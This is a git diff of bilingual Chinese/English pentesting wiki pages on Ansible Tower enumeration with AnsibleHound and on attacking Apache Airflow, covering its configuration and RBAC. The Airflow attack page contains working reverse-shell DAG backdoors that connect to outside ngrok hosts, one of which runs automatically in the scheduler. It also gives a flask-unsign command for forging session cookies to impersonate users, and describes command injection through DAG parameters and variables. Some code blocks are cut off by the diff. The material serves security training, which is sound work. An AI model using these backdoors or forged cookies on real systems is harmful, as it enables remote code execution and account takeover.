## Enumeration & Attack-Path Mapping with AnsibleHound
`AnsibleHound` 是一个开源的 BloodHound *OpenGraph* 收集器,使用 Go 编写,将 **只读** Ansible Tower/AWX/Automation Controller API 令牌转换为完整的权限图,准备在 BloodHound(或 BloodHound Enterprise)中进行分析。
`AnsibleHound` is an open-source BloodHound *OpenGraph* collector written in Go that turns a **read-only** Ansible Tower/AWX/Automation Controller API token into a complete permission graph ready to be analysed inside BloodHound (or BloodHound Enterprise).
### 这有什么用?
1. Tower/AWX REST API 非常丰富,暴露了您的实例所知道的 **每个对象和 RBAC 关系**
2. 即使使用最低权限(**Read**)令牌,也可以递归枚举所有可访问的资源(组织、库存、主机、凭据、项目、作业模板、用户、团队……)。
3. 当原始数据转换为 BloodHound 架构时,您将获得与 Active Directory 评估中非常流行的 *攻击路径* 可视化能力相同的功能——但现在针对您的 CI/CD 资产。
### Why is this useful?
1. The Tower/AWX REST API is extremely rich and exposes **every object and RBAC relationship** your instance knows about.
2. Even with the lowest privilege (**Read**) token it is possible to recursively enumerate all accessible resources (organisations, inventories, hosts, credentials, projects, job templates, users, teams…).
3. When the raw data is converted to the BloodHound schema you obtain the same *attack-path* visualisation capabilities that are so popular in Active Directory assessments but now directed at your CI/CD estate.
因此,安全团队(和攻击者!)可以:
* 快速了解 **谁可以成为什么的管理员**
* 识别 **可以从无特权帐户访问的凭据或主机**。
* 链接多个 “Read ➜ Use ➜ Execute ➜ Admin” 边缘,以获得对 Tower 实例或基础设施的完全控制。
Security teams (and attackers!) can therefore:
* Quickly understand **who can become admin of what**.
* Identify **credentials or hosts that are reachable** from an unprivileged account.
* Chain multiple “Read ➜ Use ➜ Execute ➜ Admin” edges to obtain full control over the Tower instance or the underlying infrastructure.
### 先决条件
* 可通过 HTTPS 访问的 Ansible Tower / AWX / Automation Controller
* 仅限 **Read** 的用户 API 令牌(从 *User Details → Tokens → Create Token → scope = Read* 创建)。
* Go ≥ 1.20 用于编译收集器(或使用预构建的二进制文件)。
### Prerequisites
* Ansible Tower / AWX / Automation Controller reachable over HTTPS.
* A user API token scoped to **Read** only (created from *User Details → Tokens → Create Token → scope = Read*).
* Go ≥ 1.20 to compile the collector (or use the pre-built binaries).
### 构建和运行
### Building & Running
```bash
# Compile the collector
cd collector
@@ -162,7 +164,7 @@ go build . -o build/ansiblehound
# Execute against the target instance
./build/ansiblehound -u "https://tower.example.com/" -t "READ_ONLY_TOKEN"
```
内部的 AnsibleHound 执行 *分页* `GET` 请求,针对(至少)以下端点,并自动跟随每个 JSON 对象中返回的 `related` 链接:
Internally AnsibleHound performs *paginated* `GET` requests against (at least) the following endpoints and automatically follows the `related` links returned in every JSON object:
```
/api/v2/organizations/
/api/v2/inventories/
@@ -173,32 +175,37 @@ go build . -o build/ansiblehound
/api/v2/users/
/api/v2/teams/
```
所有收集的页面都合并到一个单一的 JSON 文件中(默认:`ansiblehound-output.json`)。
All collected pages are merged into a single JSON file on disk (default: `ansiblehound-output.json`).
### BloodHound 转换
原始 Tower 数据随后被 **转换为 BloodHound OpenGraph**,使用以 `AT`Ansible Tower)为前缀的自定义节点:
### BloodHound Transformation
The raw Tower data is then **transformed to BloodHound OpenGraph** using custom nodes prefixed with `AT` (Ansible Tower):
* `ATOrganization`, `ATInventory`, `ATHost`, `ATJobTemplate`, `ATProject`, `ATCredential`, `ATUser`, `ATTeam`
以及建模关系/权限的边:
And edges modelling relationships / privileges:
* `ATContains`, `ATUses`, `ATExecute`, `ATRead`, `ATAdmin`
结果可以直接导入到 BloodHound
The result can be imported straight into BloodHound:
```bash
neo4j stop # if BloodHound CE is running locally
bloodhound-import ansiblehound-output.json
```
您可以选择上传 **自定义图标**,以便新节点类型在视觉上有所区别:
Optionally you can upload **custom icons** so that the new node types are visually distinct:
```bash
python3 scripts/import-icons.py "https://bloodhound.example.com" "BH_JWT_TOKEN"
```
### 防御与攻击考虑
* *读取* 令牌通常被认为是无害的,但仍然泄露 **完整拓扑和每个凭证元数据**。将其视为敏感信息!
* 强制 **最小权限** 并轮换/撤销未使用的令牌。
* 监控 API 以防止过度枚举(多个连续的 `GET` 请求,高分页活动)。
* 从攻击者的角度来看,这是一种完美的 *初始立足点 → 权限提升* 技术,适用于 CI/CD 管道。
## 参考
* [AnsibleHound Ansible Tower/AWX 的 BloodHound 收集器](https://github.com/TheSleekBoyCompany/AnsibleHound)
### Defensive & Offensive Considerations
* A *Read* token is normally considered harmless but still leaks the **full topology and every credential metadata**. Treat it as sensitive!
* Enforce **least privilege** and rotate / revoke unused tokens.
* Monitor the API for excessive enumeration (multiple sequential `GET` requests, high pagination activity).
* From an attacker perspective this is a perfect *initial foothold → privilege escalation* technique inside the CI/CD pipeline.
## References
* [AnsibleHound BloodHound Collector for Ansible Tower/AWX](https://github.com/TheSleekBoyCompany/AnsibleHound)
* [BloodHound OSS](https://github.com/BloodHoundAD/BloodHound)
{{#include ../banners/hacktricks-training.md}}

View File

@@ -2,21 +2,22 @@
{{#include ../../banners/hacktricks-training.md}}
### 基本信息
### Basic Information
[**Apache Airflow**](https://airflow.apache.org) 是一个用于 **编排和调度数据管道或工作流** 的平台。在数据管道的上下文中,“编排”一词指的是安排、协调和管理来自各种来源的复杂数据工作流的过程。这些编排的数据管道的主要目的是提供经过处理和可消费的数据集。这些数据集被广泛应用于众多应用程序,包括但不限于商业智能工具、数据科学和机器学习模型,所有这些都是大数据应用程序正常运行的基础。
[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications.
基本上,Apache Airflow 允许您 **在某些事情发生时调度代码的执行**事件cron
Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**.
### 本地实验室
### Local Lab
#### Docker-Compose
您可以使用来自 [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) **docker-compose 配置文件** 启动一个完整的 apache airflow docker 环境。(如果您使用的是 MacOS请确保为 docker VM 提供至少 6GB RAM)。
You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM).
#### Minikube
运行 apache airflow 的一种简单方法是 **使用 minikube**
One easy way to **run apache airflo**w is to run it **with minikube**:
```bash
helm repo add airflow-stable https://airflow-helm.github.io/charts
helm repo update
@@ -26,9 +27,10 @@ helm install airflow-release airflow-stable/airflow
# Use this command to delete it
helm delete airflow-release
```
### Airflow 配置
Airflow 可能在其配置中存储 **敏感信息**,或者您可能会发现存在弱配置:
### Airflow Configuration
Airflow might store **sensitive information** in its configuration or you can find weak configurations in place:
{{#ref}}
airflow-configuration.md
@@ -36,62 +38,65 @@ airflow-configuration.md
### Airflow RBAC
在攻击 Airflow 之前,您应该了解 **权限是如何工作的**
Before start attacking Airflow you should understand **how permissions work**:
{{#ref}}
airflow-rbac.md
{{#endref}}
### 攻击
### Attacks
#### Web 控制台枚举
#### Web Console Enumeration
如果您有 **访问 web 控制台** 的权限,您可能能够访问以下一些或全部信息:
If you have **access to the web console** you might be able to access some or all of the following information:
- **变量**(自定义敏感信息可能存储在这里)
- **连接**(自定义敏感信息可能存储在这里)
- `http://<airflow>/connection/list/` 访问它们
- [**配置**](./#airflow-configuration)(敏感信息如 **`secret_key`** 和密码可能存储在这里)
- 列出 **用户和角色**
- **每个 DAG 的代码**(可能包含有趣的信息)
- **Variables** (Custom sensitive information might be stored here)
- **Connections** (Custom sensitive information might be stored here)
- Access them in `http://<airflow>/connection/list/`
- [**Configuration**](#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here)
- List **users & roles**
- **Code of each DAG** (which might contain interesting info)
#### 检索变量值
#### Retrieve Variables Values
变量可以存储在 Airflow 中,以便 **DAG** 可以 **访问** 其值。这类似于其他平台的秘密。如果您有 **足够的权限**,可以在 GUI 中访问它们,地址为 `http://<airflow>/variable/list/`\
Airflow 默认会在 GUI 中显示变量的值,但是,根据 [**这个**](https://marclamberti.com/blog/variables-with-apache-airflow/) 的说法,可以设置一个 **变量列表**,其 **值** 将在 **GUI** 中显示为 **星号**
Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http://<airflow>/variable/list/`.\
Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**.
![](<../../images/image (164).png>)
然而,这些 **值** 仍然可以通过 **CLI**(您需要有数据库访问权限)、**任意 DAG** 执行、**API** 访问变量端点API 需要被激活),甚至 **GUI 本身****检索**\
要从 GUI 访问这些值,只需 **选择您想访问的变量**,然后 **点击操作 -> 导出**\
另一种方法是对 **隐藏值** 进行 **暴力破解**,使用 **搜索过滤** 直到您获得它:
However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\
To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\
Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it:
![](<../../images/image (152).png>)
#### 权限提升
#### Privilege Escalation
If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**.
如果 **`expose_config`** 配置设置为 **True**,从 **用户角色****以上** 可以 **读取** **web 中的配置**。在此配置中,**`secret_key`** 出现,这意味着任何拥有此有效密钥的用户都可以 **创建自己的签名 cookie 来冒充任何其他用户账户**
```bash
flask-unsign --sign --secret '<secret_key>' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
```
#### DAG 后门 (Airflow worker 中的 RCE)
如果您对 **DAG 保存的位置****写入权限**,您可以 **创建一个** 发送 **反向 shell****DAG**。\
请注意,这个反向 shell 将在 **airflow worker 容器** 内部执行:
#### DAG Backdoor (RCE in Airflow worker)
If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\
Note that this reverse shell is going to be executed inside an **airflow worker container**:
```python
import pendulum
from airflow import DAG
from airflow.operators.bash import BashOperator
with DAG(
dag_id='rev_shell_bash',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
dag_id='rev_shell_bash',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = BashOperator(
task_id='run',
bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
)
run = BashOperator(
task_id='run',
bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
)
```
```python
@@ -100,66 +105,74 @@ from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
with DAG(
dag_id='rev_shell_python',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
dag_id='rev_shell_python',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = PythonOperator(
task_id='rs_python',
python_callable=rs,
op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
)
run = PythonOperator(
task_id='rs_python',
python_callable=rs,
op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
)
```
#### DAG 后门 (Airflow 调度器中的 RCE)
如果您将某些内容设置为 **在代码的根目录中执行**,在撰写本文时,它将在放置到 DAG 文件夹后几秒钟内 **由调度器执行**
#### DAG Backdoor (RCE in Airflow scheduler)
If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder.
```python
import pendulum, socket, os, pty
from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
rs("2.tcp.ngrok.io", 14403)
with DAG(
dag_id='rev_shell_python2',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
dag_id='rev_shell_python2',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = PythonOperator(
task_id='rs_python2',
python_callable=rs,
op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
run = PythonOperator(
task_id='rs_python2',
python_callable=rs,
op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
```
#### DAG 创建
如果你成功**攻陷了 DAG 集群中的一台机器**,你可以在 `dags/` 文件夹中创建新的 **DAG 脚本**,它们将会在 DAG 集群中的其余机器上**复制**。
#### DAG Creation
#### DAG 代码注入
If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster.
当你从 GUI 执行一个 DAG 时,你可以**传递参数**给它。\
因此,如果 DAG 编写不当,它可能会**容易受到命令注入的攻击。**\
这就是在这个 CVE 中发生的情况: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
#### DAG Code Injection
你需要知道的**开始寻找 DAG 中命令注入的方法**是**参数**是通过代码**`dag_run.conf.get("param_name")`**来**访问**的。
When you execute a DAG from the GUI you can **pass arguments** to it.\
Therefore, if the DAG is not properly coded it could be **vulnerable to Command Injection.**\
That is what happened in this CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
All you need to know to **start looking for command injections in DAGs** is that **parameters** are **accessed** with the code **`dag_run.conf.get("param_name")`**.
Moreover, the same vulnerability might occur with **variables** (note that with enough privileges you could **control the value of the variables** in the GUI). Variables are **accessed with**:
此外,**变量**也可能出现相同的漏洞(请注意,拥有足够权限的情况下,你可以在 GUI 中**控制变量的值**)。变量通过以下方式**访问**:
```python
from airflow.models import Variable
[...]
foo = Variable.get("foo")
```
如果它们例如在 bash 命令中使用,您可能会执行命令注入。
If they are used for example inside a a bash command, you could perform a command injection.
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,105 +1,114 @@
# Airflow 配置
# Airflow Configuration
{{#include ../../banners/hacktricks-training.md}}
## 配置文件
## Configuration File
**Apache Airflow** 在所有 airflow 机器上生成一个名为 **`airflow.cfg`** 的 **配置文件**,该文件位于 airflow 用户的主目录中。此配置文件包含配置信息,并且 **可能包含有趣和敏感的信息。**
**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.**
**访问此文件有两种方式:通过攻陷某个 airflow 机器,或访问 web 控制台。**
**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.**
请注意,**配置文件中的值** **可能不是实际使用的值**,因为您可以通过设置环境变量如 `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'` 来覆盖它们。
Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`.
如果您可以访问 **web 服务器中的配置文件**,您可以在同一页面上检查 **实际运行的配置**\
如果您可以访问 **airflow 环境中的某台机器**,请检查 **环境**
If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\
If you have **access to some machine inside the airflow env**, check the **environment**.
在阅读配置文件时,一些有趣的值:
Some interesting values to check when reading the config file:
### \[api]
- **`access_control_allow_headers`**: 这表示 **CORS** **允许** **头部**
- **`access_control_allow_methods`**: 这表示 **CORS** **允许方法**
- **`access_control_allow_origins`**: 这表示 **CORS** **允许来源**
- **`auth_backend`**: [**根据文档**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) 可以配置一些选项来控制谁可以访问 API
- `airflow.api.auth.backend.deny_all`: **默认情况下没有人**可以访问 API
- `airflow.api.auth.backend.default`: **每个人都可以**在没有认证的情况下访问
- `airflow.api.auth.backend.kerberos_auth`: 配置 **kerberos 认证**
- `airflow.api.auth.backend.basic_auth`: 用于 **基本认证**
- `airflow.composer.api.backend.composer_auth`: 使用 composer 认证 (GCP) (来自 [**这里**](https://cloud.google.com/composer/docs/access-airflow-api))
- `composer_auth_user_registration_role`: 这表示 **composer 用户** **airflow** 中将获得的 **角色**(默认是 **Op**)。
- 您还可以使用 Python **创建您自己的认证** 方法。
- **`google_key_path`:** GCP 服务账户密钥的路径
- **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS**
- **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS**
- **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS**
- **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API:
- `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API
- `airflow.api.auth.backend.default`: **Everyone can** access it without authentication
- `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication**
- `airflow.api.auth.backend.basic_auth`: For **basic authentication**
- `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)).
- `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default).
- You can also **create you own authentication** method with python.
- **`google_key_path`:** Path to the **GCP service account key**
### **\[atlas]**
- **`password`**: Atlas 密码
- **`username`**: Atlas 用户名
- **`password`**: Atlas password
- **`username`**: Atlas username
### \[celery]
- **`flower_basic_auth`** : 凭据 (_user1:password1,user2:password2_)
- **`result_backend`**: 可能包含 **凭据** 的 Postgres URL。
- **`ssl_cacert`**: cacert 的路径
- **`ssl_cert`**: 证书的路径
- **`ssl_key`**: 密钥的路径
- **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_)
- **`result_backend`**: Postgres url which may contain **credentials**.
- **`ssl_cacert`**: Path to the cacert
- **`ssl_cert`**: Path to the cert
- **`ssl_key`**: Path to the key
### \[core]
- **`dag_discovery_safe_mode`**: 默认启用。在发现 DAG 时,忽略任何不包含字符串 `DAG` `airflow` 的文件。
- **`fernet_key`**: 用于存储加密变量的密钥(对称)
- **`hide_sensitive_var_conn_fields`**: 默认启用,隐藏连接的敏感信息。
- **`security`**: 使用哪个安全模块(例如 kerberos
- **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that dont contain the strings `DAG` and `airflow`.
- **`fernet_key`**: Key to store encrypted variables (symmetric)
- **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections.
- **`security`**: What security module to use (for example kerberos)
### \[dask]
- **`tls_ca`**: ca 的路径
- **`tls_cert`**: 证书的路径
- **`tls_key`**: tls 密钥的路径
- **`tls_ca`**: Path to ca
- **`tls_cert`**: Part to the cert
- **`tls_key`**: Part to the tls key
### \[kerberos]
- **`ccache`**: ccache 文件的路径
- **`forwardable`**: 默认启用
- **`ccache`**: Path to ccache file
- **`forwardable`**: Enabled by default
### \[logging]
- **`google_key_path`**: GCP JSON 凭据的路径。
- **`google_key_path`**: Path to GCP JSON creds.
### \[secrets]
- **`backend`**: 要启用的秘密后端的完整类名
- **`backend_kwargs`**: backend_kwargs 参数被加载到字典中并传递给秘密后端类的 **init**
- **`backend`**: Full class name of secrets backend to enable
- **`backend_kwargs`**: The backend_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class.
### \[smtp]
- **`smtp_password`**: SMTP 密码
- **`smtp_user`**: SMTP 用户
- **`smtp_password`**: SMTP password
- **`smtp_user`**: SMTP user
### \[webserver]
- **`cookie_samesite`**: 默认是 **Lax**,因此它已经是最弱的可能值
- **`cookie_secure`**: 在会话 cookie 上设置 **安全标志**
- **`expose_config`**: 默认是 False,如果为 true**配置** 可以从 web **控制台** **读取**
- **`expose_stacktrace`**: 默认是 True它将显示 **python 回溯**(对攻击者可能有用)
- **`secret_key`**: 这是 **flask 用于签名 cookie 的密钥**(如果您拥有此密钥,您可以 **冒充 Airflow 中的任何用户**
- **`web_server_ssl_cert`**: **SSL** **证书** **路径**
- **`web_server_ssl_key`**: **SSL** **密钥** **路径**
- **`x_frame_enabled`**: 默认是 **True**,因此默认情况下不可能发生点击劫持
- **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value
- **`cookie_secure`**: Set **secure flag** on the the session cookie
- **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console**
- **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker)
- **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**)
- **`web_server_ssl_cert`**: **Path** to the **SSL** **cert**
- **`web_server_ssl_key`**: **Path** to the **SSL** **Key**
- **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible
### Web 认证
### Web Authentication
By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as
默认情况下,**web 认证** 在文件 **`webserver_config.py`** 中指定并配置为
```bash
AUTH_TYPE = AUTH_DB
```
这意味着**身份验证是针对数据库进行检查的**。然而,还有其他配置是可能的,例如
Which means that the **authentication is checked against the database**. However, other configurations are possible like
```bash
AUTH_TYPE = AUTH_OAUTH
```
将**身份验证留给第三方服务**。
然而,还有一个选项可以**允许匿名用户访问**,将以下参数设置为**所需角色**
To leave the **authentication to third party services**.
However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**:
```bash
AUTH_ROLE_PUBLIC = 'Admin'
```
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -4,40 +4,43 @@
## RBAC
(来自文档)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow 默认提供了一组 **角色**: **Admin**, **User**, **Op**, **Viewer**, **Public**。**只有 `Admin`** 用户可以 **配置/更改其他角色的权限**。但不建议 `Admin` 用户以任何方式更改这些默认角色,删除或添加这些角色的权限。
(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles.
- **`Admin`** 用户拥有所有可能的权限。
- **`Public`** 用户(匿名)没有任何权限。
- **`Viewer`** 用户拥有有限的查看权限(仅可读)。他 **无法查看配置。**
- **`User`** 用户拥有 `Viewer` 权限以及额外的用户权限,允许他管理 DAG。他 **可以查看配置文件。**
- **`Op`** 用户拥有 `User` 权限以及额外的操作权限。
- **`Admin`** users have all possible permissions.
- **`Public`** users (anonymous) dont have any permissions.
- **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.**
- **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file**
- **`Op`** users have `User` permissions plus additional op permissions.
请注意,**admin** 用户可以 **创建更多角色**,并赋予更 **细粒度的权限**
Note that **admin** users can **create more roles** with more **granular permissions**.
还要注意,唯一具有 **列出用户和角色权限的默认角色是 Admin连 Op** 都无法做到这一点。
Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that.
### 默认权限
### Default Permissions
以下是每个默认角色的默认权限:
These are the default permissions per default role:
- **Admin**
\[可以在 Connections 上删除,可以在 Connections 上读取,可以在 Connections 上编辑,可以在 Connections 上创建,可以在 DAGs 上读取,可以在 DAGs 上编辑,可以在 DAGs 上删除,可以在 DAG Runs 上读取,可以在 Task Instances 上读取,可以在 Task Instances 上编辑,可以在 DAG Runs 上删除,可以在 DAG Runs 上创建,可以在 DAG Runs 上编辑,可以在 Audit Logs 上读取,可以在 ImportError 上读取,可以在 Pools 上删除,可以在 Pools 上读取,可以在 Pools 上编辑,可以在 Pools 上创建,可以在 Providers 上读取,可以在 Variables 上删除,可以在 Variables 上读取,可以在 Variables 上编辑,可以在 Variables 上创建,可以在 XComs 上读取,可以在 DAG Code 上读取,可以在 Configurations 上读取,可以在 Plugins 上读取,可以在 Roles 上读取,可以在 Permissions 上读取,可以在 Roles 上删除,可以在 Roles 上编辑,可以在 Roles 上创建,可以在 Users 上读取,可以在 Users 上创建,可以在 Users 上编辑,可以在 Users 上删除,可以在 DAG Dependencies 上读取,可以在 Jobs 上读取,可以在 My Password 上读取,可以在 My Password 上编辑,可以在 My Profile 上读取,可以在 My Profile 上编辑,可以在 SLA Misses 上读取,可以在 Task Logs 上读取,可以在 Website 上读取,菜单访问 Browse菜单访问 DAG Dependencies菜单访问 DAG Runs菜单访问 Documentation菜单访问 Docs菜单访问 Jobs菜单访问 Audit Logs菜单访问 Plugins菜单访问 SLA Misses菜单访问 Task Instances可以在 Task Instances 上创建,可以在 Task Instances 上删除,菜单访问 Admin菜单访问 Configurations菜单访问 Connections菜单访问 Pools菜单访问 Variables菜单访问 XComs可以在 XComs 上删除,可以在 Task Reschedules 上读取,菜单访问 Task Reschedules,可以在 Triggers 上读取,菜单访问 Triggers可以在 Passwords 上读取,可以在 Passwords 上编辑,菜单访问 List Users菜单访问 Security菜单访问 List Roles可以在 User Stats Chart 上读取,菜单访问 User's Statistics,菜单访问 Base Permissions,可以在 View Menus 上读取,菜单访问 Views/Menus可以在 Permission Views 上读取,菜单访问 Permission on Views/Menus,可以在 MenuApi 上获取,菜单访问 Providers可以在 XComs 上创建]
\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs]
- **Op**
\[可以在 Connections 上删除,可以在 Connections 上读取,可以在 Connections 上编辑,可以在 Connections 上创建,可以在 DAGs 上读取,可以在 DAGs 上编辑,可以在 DAGs 上删除,可以在 DAG Runs 上读取,可以在 Task Instances 上读取,可以在 Task Instances 上编辑,可以在 DAG Runs 上删除,可以在 DAG Runs 上创建,可以在 DAG Runs 上编辑,可以在 Audit Logs 上读取,可以在 ImportError 上读取,可以在 Pools 上删除,可以在 Pools 上读取,可以在 Pools 上编辑,可以在 Pools 上创建,可以在 Providers 上读取,可以在 Variables 上删除,可以在 Variables 上读取,可以在 Variables 上编辑,可以在 Variables 上创建,可以在 XComs 上读取,可以在 DAG Code 上读取,可以在 Configurations 上读取,可以在 Plugins 上读取,可以在 DAG Dependencies 上读取,可以在 Jobs 上读取,可以在 My Password 上读取,可以在 My Password 上编辑,可以在 My Profile 上读取,可以在 My Profile 上编辑,可以在 SLA Misses 上读取,可以在 Task Logs 上读取,可以在 Website 上读取,菜单访问 Browse菜单访问 DAG Dependencies菜单访问 DAG Runs菜单访问 Documentation菜单访问 Docs菜单访问 Jobs菜单访问 Audit Logs菜单访问 Plugins菜单访问 SLA Misses菜单访问 Task Instances可以在 Task Instances 上创建,可以在 Task Instances 上删除,菜单访问 Admin菜单访问 Configurations菜单访问 Connections菜单访问 Pools菜单访问 Variables菜单访问 XComs可以在 XComs 上删除]
